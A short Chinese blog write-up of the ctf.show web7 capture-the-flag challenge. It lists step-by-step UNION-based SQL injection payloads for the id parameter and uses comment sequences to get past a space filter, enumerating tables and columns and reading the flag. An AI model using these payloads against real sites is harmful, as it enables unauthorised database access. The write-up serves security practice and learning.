ctfShow7_8
ctf.show_web7
点开题目中列表,没有发现有价值的信息
但是URL中出现了**?id=**字样,可能是sql注入
http://579975c2-c8b2-48a7-955a-efc4b38455a6.challenge.ctf.show/?id=1
简单判断有无注入点
id=1'
单引号判断(可能因为单引号不匹配而报错)
/index.php?id=1’ #
不报错
尝试后发现==空格==被过滤
使用==//==或==/**/==绕过过滤
爆显示位 | ?id=1%27//or//1=1//union//select/**/1,2,3# |
---|---|
爆表 | ?id=1//union//select//1,group_concat(table_name),3//from//information_schema.tables//where/**/table_schema=database()# |
爆字段 | ?id=-1//union//select//1,group_concat(column_name),3//from//information_schema.columns//where/**/table_name=”flag”# |
爆值 | ?id=-1//union//select//1,flag,3//from/**/flag# |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Kanyun's Blog!
评论